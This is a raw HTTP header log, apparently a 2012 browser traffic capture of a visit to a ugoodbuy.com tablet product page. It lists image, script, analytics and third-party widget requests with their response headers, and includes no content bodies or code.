Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=23
Connection: Keep-Alive
GET /includes/templates/slucky/images/diggbtnimg.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:09:06 GMT
Etag: &quot;9a5d044-98-4c251e7f8494d&quot;
Accept-Ranges: bytes
Content-Length: 152
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=24
Connection: Keep-Alive
GET /images/FreeShipping_icon.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:56:46 GMT
Etag: &quot;9a5944a-f0c-4c251bbda14e5&quot;
Accept-Ranges: bytes
Content-Length: 3852
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
GET /images/pic_3.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:58:26 GMT
Etag: &quot;9a594a8-5338-4c251c1c69880&quot;
Accept-Ranges: bytes
Content-Length: 21304
Keep-Alive: timeout=10, max=24
Connection: Keep-Alive
GET /images/trustwave.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:59:00 GMT
Etag: &quot;9a594be-486b-4c251c3cd6500&quot;
Accept-Ranges: bytes
Content-Length: 18539
Keep-Alive: timeout=10, max=22
Connection: Keep-Alive
GET /bmz_cache/0/05294c5d71653cbc898ade47afa56486.image.75x75.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Wed, 20 Jun 2012 02:07:33 GMT
Etag: &quot;9a74bc1-8b1-4c2dddcb12340&quot;
Accept-Ranges: bytes
Content-Length: 2225
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=22
Connection: Keep-Alive
GET /bmz_cache/1/1037ac6ca7e48e60f4146d60e9ef3383.image.75x75.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Thu, 26 Jul 2012 09:35:39 GMT
Etag: &quot;9a74bc2-9bd-4c5b8518270c0&quot;
Accept-Ranges: bytes
Content-Length: 2493
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=23
Connection: Keep-Alive
GET /bmz_cache/5/51f139b1b3427881b59beb1b9a64bee8.image.60x60.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Tue, 26 Jun 2012 07:13:52 GMT
Etag: &quot;9a7624b-6aa-4c35ad736ac00&quot;
Accept-Ranges: bytes
Content-Length: 1706
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=27
Connection: Keep-Alive
GET /includes/templates/slucky/jscript/jscript_swfobject.js HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:14:35 GMT
Etag: &quot;9a60171-22a4-4c251fb89a3d5&quot;
Accept-Ranges: bytes
Content-Length: 8868
Vary: Accept-Encoding
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=23
Connection: Keep-Alive
GET /images/live%20chat.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:18 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:57:47 GMT
Etag: &quot;9a5948a-6894-4c251bf7380c0&quot;
Accept-Ranges: bytes
Content-Length: 26772
Keep-Alive: timeout=10, max=23
Connection: Keep-Alive
GET /bmz_cache/a/a5b4eddff278b4e860d07d0aa3badb2e.image.60x60.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Tue, 26 Jun 2012 07:13:52 GMT
Etag: &quot;9a7624d-6b0-4c35ad736ac00&quot;
Accept-Ranges: bytes
Content-Length: 1712
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=21
Connection: Keep-Alive
GET /bmz_cache/a/a458b5bc516e2341acf1a2b67fa6e8fc.image.60x60.jpg HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Tue, 26 Jun 2012 07:42:32 GMT
Etag: &quot;9a7626e-6b4-4c35b3dbbca00&quot;
Accept-Ranges: bytes
Content-Length: 1716
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=21
Connection: Keep-Alive
GET /images/calculate.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:56:21 GMT
Etag: &quot;9a59427-171-4c251ba533f40&quot;
Accept-Ranges: bytes
Content-Length: 369
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=22
Connection: Keep-Alive
GET /images/validcode.png?rand=7637367886151215 HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Tue, 06 Nov 2012 22:12:14 GMT
Etag: &quot;9a594c0-1bd-4cddae4eacb80&quot;
Accept-Ranges: bytes
Content-Length: 445
Keep-Alive: timeout=10, max=26
Connection: Keep-Alive
GET /includes/templates/slucky/images/tabs_3_.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_sheets.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:13:29 GMT
Etag: &quot;9a5d2a3-1b7-4c251f7a04c15&quot;
Accept-Ranges: bytes
Content-Length: 439
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=22
Connection: Keep-Alive
GET /images/glbl-sprite-sitewide1.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Wed, 27 Jun 2012 08:41:43 GMT
Etag: &quot;9a59548-98b-4c3702f3b1fc0&quot;
Accept-Ranges: bytes
Content-Length: 2443
Keep-Alive: timeout=10, max=20
Connection: Keep-Alive
GET /includes/templates/slucky/images/tab_right.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_sheets.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:13:25 GMT
Etag: &quot;9a5d29e-196-4c251f75c3f40&quot;
Accept-Ranges: bytes
Content-Length: 406
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=20
Connection: Keep-Alive
GET /images/nav-crossLinks_v2.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Wed, 27 Jun 2012 09:25:15 GMT
Etag: &quot;9a59492-208a-4c370caeb14c0&quot;
Accept-Ranges: bytes
Content-Length: 8330
Keep-Alive: timeout=10, max=21
Connection: Keep-Alive
GET /images/glbl-sprite-blue.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Wed, 27 Jun 2012 08:17:20 GMT
Etag: &quot;9a59545-34d6-4c36fd8078400&quot;
Accept-Ranges: bytes
Content-Length: 13526
Keep-Alive: timeout=10, max=25
Connection: Keep-Alive
GET /__utm.gif?utmwv=5.3.6&utms=1&utmn=1369561535&utmhn=www.ugoodbuy.com&utmcs=UTF-8&utmsr=1176x885&utmvp=1176x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Discount%20China%20Cube%20U18GT%20Elite%207%27%27%20Android%204.0%20Tablet%20Rockchip%202918%201.2GHz%201024x600%205-Point%20Capacitive%20Screen%20with%20Camera%20HDMI%20USB%203G%20%5B1204171%5D%20-%20US%24108.99%20%3A%20UGoodBuy%20Online%20Store&utmhid=1342407354&utmr=-&utmp=%2Fcube-u18gt-elite_g3201.html&utmac=UA-31951305-1&utmcc=__utma%3D203917716.1215813550.1352239940.1352239940.1352239940.1%3B%2B__utmz%3D203917716.1352239940.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.6&amp;utms=1&amp;utmn=1369561535&amp;utmhn=www.ugoodbuy.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1176x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Discount%20China%20Cube%20U18GT%20Elite%207%27%27%20Android%204.0%20Tablet%20Rockchip%202918%201.2GHz%201024x600%205-Point%20Capacitive%20Screen%20with%20Camera%20HDMI%20USB%203G%20%5B1204171%5D%20-%20US%24108.99%20%3A%20UGoodBuy%20Online%20Store&amp;utmhid=1342407354&amp;utmr=-&amp;utmp=%2Fcube-u18gt-elite_g3201.html&amp;utmac=UA-31951305-1&amp;utmcc=__utma%3D203917716.1215813550.1352239940.1352239940.1352239940.1%3B%2B__utmz%3D203917716.1352239940.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:09:14 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 507785
Server: GFE/2.0
GET /static/r07/core046.js HTTP/1.1

Host: ct5.addthis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: public, no-check, max-age=86313600
Date: Tue, 06 Nov 2012 22:12:19 GMT
Last-Modified: Thu, 01 Nov 2012 11:59:11 GMT
Server: ECS (arn/46EB)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 48365
GET /images/search-go-yellow.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Wed, 27 Jun 2012 06:55:46 GMT
Etag: &quot;9a59546-4b9-4c36eb4530080&quot;
Accept-Ranges: bytes
Content-Length: 1209
Keep-Alive: timeout=10, max=21
Connection: Keep-Alive
GET /feed/frames.php?uid=99&frames=2 HTTP/1.1

Host: click.rndtrg.com
GET /feed/frames.php?uid=99&amp;frames=2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Server: nginx
Date: Tue, 06 Nov 2012 22:12:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.16-1~dotdeb.0
Content-Encoding: gzip
GET /images/prev_ll.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/images/lightbox.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:58:32 GMT
Etag: &quot;9a594ad-a7-4c251c2222600&quot;
Accept-Ranges: bytes
Content-Length: 167
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=24
Connection: Keep-Alive
GET /logo.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2012 09:24:03 GMT
Etag: &quot;9a591db-18f7-4c384e477d2c0&quot;
Accept-Ranges: bytes
Content-Length: 6391
Keep-Alive: timeout=10, max=19
Connection: Keep-Alive
GET /static/r07/widget097.css HTTP/1.1

Host: ct5.addthis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: public, no-check, max-age=86313600
Date: Tue, 06 Nov 2012 22:12:19 GMT
Last-Modified: Thu, 01 Nov 2012 11:59:12 GMT
Server: ECS (arn/46FD)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 21696
GET /images/header-mastnav.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/images/global-03Beta.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:19 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2012 07:25:24 GMT
Etag: &quot;9a59450-b854-4c3833c248100&quot;
Accept-Ranges: bytes
Content-Length: 47188
Keep-Alive: timeout=10, max=19
Connection: Keep-Alive
GET /includes/templates/slucky/images/digg.png HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:09:02 GMT
Etag: &quot;9a5d03a-88d-4c251e7af2f80&quot;
Accept-Ranges: bytes
Content-Length: 2189
Keep-Alive: timeout=10, max=18
Connection: Keep-Alive
GET /images/next_ll.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/images/lightbox.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 02:58:05 GMT
Etag: &quot;9a59498-a7-4c251c08d2d15&quot;
Accept-Ranges: bytes
Content-Length: 167
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=20
Connection: Keep-Alive
GET /includes/templates/slucky/images/diggbtnbg.gif HTTP/1.1

Host: www.ugoodbuy.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/includes/templates/slucky/css/style_theme-1.css
Cookie: __utma=203917716.1215813550.1352239940.1352239940.1352239940.1; __utmb=203917716.1.10.1352239940; __utmc=203917716; __utmz=203917716.1352239940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: Apache
Last-Modified: Wed, 13 Jun 2012 03:09:04 GMT
Etag: &quot;9a5d03e-ca-4c251e7cdb400&quot;
Accept-Ranges: bytes
Content-Length: 202
Cache-Control: max-age=5592000
Keep-Alive: timeout=10, max=23
Connection: Keep-Alive
GET /scripts/main/utils-init-ajaxlib/upfront-badgeinit.js HTTP/1.1

Host: upfront.thefind.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ugoodbuy.com/cube-u18gt-elite_g3201.html
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Date: Tue, 06 Nov 2012 22:12:20 GMT
Server: PWS/8.0.9.6
X-Px: ht lhr-agg-n9.panthercdn.com
P3P: policyref=&quot;http://www.thefind.com/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV INT&quot;
Cache-Control: max-age=600
Expires: Tue, 06 Nov 2012 22:18:36 GMT
Age: 224
Content-Length: 26502
Content-Language: en
Content-Encoding: gzip
Vary: Accept-Encoding
